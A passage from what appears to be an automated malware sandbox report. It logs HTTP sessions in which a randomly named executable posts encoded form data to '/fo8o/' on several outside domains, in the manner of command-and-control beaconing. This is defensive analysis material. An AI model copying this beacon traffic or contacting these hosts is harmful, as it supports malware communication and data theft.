                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549806116.50.37.244803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:05.081207037 CET1836OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.goldenjade-travel.com
                                                                                Origin: http://www.goldenjade-travel.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a [TRUNCATED]
                                                                                Data Ascii: UzG=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVFix [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549812116.50.37.244803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:07.736605883 CET521OUTGET /fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.goldenjade-travel.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:24:09.427828074 CET492INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html; charset=us-ascii
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 24 Dec 2024 07:24:08 GMT
                                                                                Connection: close
                                                                                Content-Length: 315
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.54984885.159.66.93803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:23.566631079 CET778OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.magmadokum.com
                                                                                Origin: http://www.magmadokum.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.magmadokum.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                Data Ascii: UzG=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.54985485.159.66.93803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:26.222455978 CET798OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.magmadokum.com
                                                                                Origin: http://www.magmadokum.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.magmadokum.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67
                                                                                Data Ascii: UzG=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.54986085.159.66.93803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:28.877325058 CET1815OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.magmadokum.com
                                                                                Origin: http://www.magmadokum.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.magmadokum.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c [TRUNCATED]
                                                                                Data Ascii: UzG=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8FxMZ [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.54986785.159.66.93803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:24:31.533456087 CET514OUTGET /fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.magmadokum.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:25:32.858721018 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.54998791.195.240.94803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:25:38.355437040 CET781OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rssnewscast.com
                                                                                Origin: http://www.rssnewscast.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 204
                                                                                Referer: http://www.rssnewscast.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d
                                                                                Data Ascii: UzG=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                Dec 24, 2024 08:25:39.636188030 CET707INHTTP/1.1 405 Not Allowed
                                                                                date: Tue, 24 Dec 2024 07:25:39 GMT
                                                                                content-type: text/html
                                                                                content-length: 556
                                                                                server: Parking/1.0
                                                                                connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.54998891.195.240.94803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:25:41.005633116 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rssnewscast.com
                                                                                Origin: http://www.rssnewscast.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.rssnewscast.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                Data Ascii: UzG=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                Dec 24, 2024 08:25:42.313630104 CET707INHTTP/1.1 405 Not Allowed
                                                                                date: Tue, 24 Dec 2024 07:25:42 GMT
                                                                                content-type: text/html
                                                                                content-length: 556
                                                                                server: Parking/1.0
                                                                                connection: close
